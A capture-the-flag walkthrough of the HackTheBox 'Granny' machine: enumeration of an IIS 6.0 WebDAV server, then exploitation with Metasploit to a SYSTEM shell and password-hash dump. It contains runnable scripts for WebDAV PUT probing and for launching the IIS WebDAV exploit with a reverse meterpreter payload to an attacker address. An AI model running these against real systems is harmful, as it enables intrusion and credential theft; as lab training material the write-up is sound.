Granny HTB Walkthrough
Hello Everyone. This is my writeup for the machine Granny on HackTheBox.
We already know that this is a Windows machine.
First, let's scan and enumerate the host with nmap.
We observe that port 80 is open, with an HTTP service that nmap identifies as Microsoft IIS httpd 6.0.
The http-methods script reports a lot of potentially risky methods allowed; the notable one is PUT, which would let us upload files to the server.
We also notice that WebDAV is enabled on this HTTP server.
Considering all of the above, we enumerate port 80 further with nikto. We also enumerate WebDAV specifically with davtest, to see whether we can upload a shell file and have the server execute it.
nikto turns up some interesting details: the FrontPage Server Extensions directories /_vti_bin/ and /_private/ are browsable, so we check them for files containing sensitive information.
The davtest output shows that we can upload files in many formats, but the extensions normally used to gain remote access are not executed by the server. A plain PUT of a web shell will therefore not give us code execution on its own.
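As an added example (not part of the original walkthrough), the script below reproduces by hand what nmap's http-methods script and davtest told us: it parses the Allow header of an OPTIONS response, flags the content-changing methods, checks the WebDAV headers, and PUTs a marker file with several extensions to see which ones come back raw and which the server executes or refuses. The target address 10.10.10.15 and the sample OPTIONS response are assumptions constructed for the offline demo; a live run uses the --live flag.

```bash
#!/bin/sh
# Added example, not from the original Granny writeup. Re-implements the checks
# nmap http-methods and davtest perform, so the findings can be re-verified
# without the tools. Assumptions: target 10.10.10.15, port 80 (placeholders).

TARGET="${TARGET:-10.10.10.15}"
BASE="http://$TARGET"

# Constructed OPTIONS response modelled on IIS 6.0 with WebDAV enabled. It is
# used only by the offline demo; a live host is queried with probe_options.
SAMPLE_OPTIONS_RESPONSE='HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
MS-Author-Via: MS-FP/4.0,DAV
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Content-Length: 0
'

# Send an OPTIONS request and return the raw status line plus headers.
probe_options() {
    curl -s -i -X OPTIONS "$1"
}

# Read a raw response on stdin; print the methods from the Allow header, one per line.
allowed_methods() {
    tr -d '\r' | awk -F': ' 'tolower($1) == "allow" { print $2 }' \
        | tr ',' '\n' | sed 's/^ *//; s/ *$//' | grep -v '^$'
}

# Keep only the methods that let an unauthenticated client alter server content.
# PUT is what drops a file on the box; COPY/MOVE matter because they can rename
# an uploaded file to another extension.
risky_methods() {
    allowed_methods | grep -E -x 'PUT|DELETE|COPY|MOVE|MKCOL|PROPPATCH|LOCK|UNLOCK'
}

# Exit 0 if the response advertises WebDAV through the DAV: or MS-Author-Via: header.
has_webdav() {
    tr -d '\r' | grep -q -i -E '^(DAV|MS-Author-Via):'
}

# PUT a small body to URL and print the HTTP status code. 201 or 204 means the
# server stored the file, which is davtest's "PUT ... SUCCEED" for that extension.
webdav_put() {
    printf '%s' "$2" | curl -s -o /dev/null -w '%{http_code}' -X PUT --data-binary @- "$1"
}

# GET the file back. If the body still holds our marker the file is served as-is;
# if not, the server executed it, rewrote it, or refused the upload (davtest's EXEC check).
fetch_contains_marker() {
    curl -s "$1" | grep -q "$2"
}

main() {
    if [ "${1:-}" = "--live" ]; then
        resp=$(probe_options "$BASE/")
        printf '%s\n' "$resp" | has_webdav && echo "WebDAV advertised"
        echo "Risky methods:"
        printf '%s\n' "$resp" | risky_methods
        marker="davcheck-$$"
        for ext in txt html asp aspx; do
            url="$BASE/$marker.$ext"
            code=$(webdav_put "$url" "$marker")
            if fetch_contains_marker "$url" "$marker"; then served=raw; else served=not-raw; fi
            echo "PUT .$ext -> $code, GET -> $served"
        done
    else
        echo "Offline demo against the constructed response:"
        printf '%s' "$SAMPLE_OPTIONS_RESPONSE" | has_webdav && echo "WebDAV advertised"
        printf '%s' "$SAMPLE_OPTIONS_RESPONSE" | risky_methods
    fi
}

main "$@"
```

Run it with --live against the box to get the same picture as nmap and davtest; a .txt that comes back raw while an .asp returns something else (or a 403 on PUT) is exactly the "uploadable but not executable" situation the davtest output described.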
Browsing the directories /_vti_bin/ and /_private/ gives us the following.
Nothing of interest turns up in any of the files and directories under /_vti_bin/, and a directory search reveals no further directories.
Next, let's look for a public exploit against Microsoft IIS httpd 6.0.
Look what we found!
The exploit needs WebDAV: our HTTP server runs WebDAV, and we know it is a Windows machine, so the target matches.
Let's give it a try.
Open Metasploit, load the exploit module and set its options.
In particular, make sure the following are configured correctly:
RHOSTS: target IP
TARGETURI: the WebDAV path, /_vti_bin/ in our case
LHOST: attacker IP (the interface that faces the target, i.e. the VPN tunnel address)
Time to fire the exploit. Voila! We get a meterpreter session, as shown below.
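To make the three settings above repeatable, here is an added example (not part of the original walkthrough) that writes them into an msfconsole resource script and, once the session is up, asks it which account it runs as rather than assuming. The target 10.10.10.15, attacker 10.10.14.2 and the module name are assumptions: the page does not name the module, and the IIS 6.0 WebDAV exploit that matches its description is CVE-2017-7269 (exploit/windows/iis/iis_webdav_scstoragepathfromurl); override MSF_MODULE if your search returned something else.

```bash
#!/bin/sh
# Added example, not from the original Granny writeup. Generates a Metasploit
# resource script with the options the text calls out (RHOSTS, TARGETURI, LHOST).
# Assumptions (placeholders, not from the page): target 10.10.10.15, attacker
# 10.10.14.2, and the module name, which the page does not state.

RHOST="${RHOST:-10.10.10.15}"
LHOST="${LHOST:-10.10.14.2}"
LPORT="${LPORT:-4444}"
TARGETURI="${TARGETURI:-/_vti_bin/}"
MSF_MODULE="${MSF_MODULE:-exploit/windows/iis/iis_webdav_scstoragepathfromurl}"

# Give the WebDAV path a leading and trailing slash: the module expects a
# directory URI, and a bare "_vti_bin" is an easy slip when retyping a screenshot.
normalize_uri() {
    uri="$1"
    case "$uri" in /*) ;; *) uri="/$uri" ;; esac
    case "$uri" in */) ;; *) uri="$uri/" ;; esac
    printf '%s' "$uri"
}

# Accept only a dotted-quad IPv4 address for RHOSTS and LHOST.
is_ipv4() {
    printf '%s' "$1" | grep -q -E '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# Print the resource script. "exploit -z" returns once the exploit finishes
# without dropping into the session, so the next lines can query it:
# "sessions -C getuid" runs getuid inside the meterpreter session, which is the
# check for whether we really are SYSTEM or a lower-privileged service account.
render_rc() {
    is_ipv4 "$1" && is_ipv4 "$3" || { echo "render_rc: RHOSTS/LHOST must be IPv4" >&2; return 1; }
    cat <<EOF
use $MSF_MODULE
set RHOSTS $1
set RPORT 80
set TARGETURI $(normalize_uri "$2")
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $3
set LPORT $4
exploit -z
sessions -C getuid
sessions -C sysinfo
EOF
}

main() {
    rc="${1:-${TMPDIR:-/tmp}/granny.rc}"
    render_rc "$RHOST" "$TARGETURI" "$LHOST" "$LPORT" > "$rc" || exit 1
    echo "wrote $rc:"
    cat "$rc"
    # Only launch msfconsole when explicitly asked.
    if [ "${2:-}" = "--run" ]; then
        msfconsole -q -r "$rc"
    fi
}

main "$@"
```

Usage: `LHOST=<your tun0 address> sh granny_msf.sh /tmp/granny.rc --run`. If getuid does not report NT AUTHORITY\SYSTEM, the session is running as the IIS worker account and a local privilege escalation step comes next; the flags will not be readable yet.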
We are SYSTEM, so we should be able to grab both the user and root flags. Confirm this with getuid before assuming it: if the session runs as a lower-privileged account, a local privilege escalation step is needed first. Let's drop into a command shell with the shell command.
This opens a Windows command prompt on the target, where the usual cmd.exe commands work.
From here we can enumerate the system further, and we can dump the local password hashes with hashdump from the meterpreter prompt (hashdump needs SYSTEM-level privileges).
Plenty of post-exploitation steps are possible, but the end goal of any CTF machine is the two flags, user.txt and root.txt.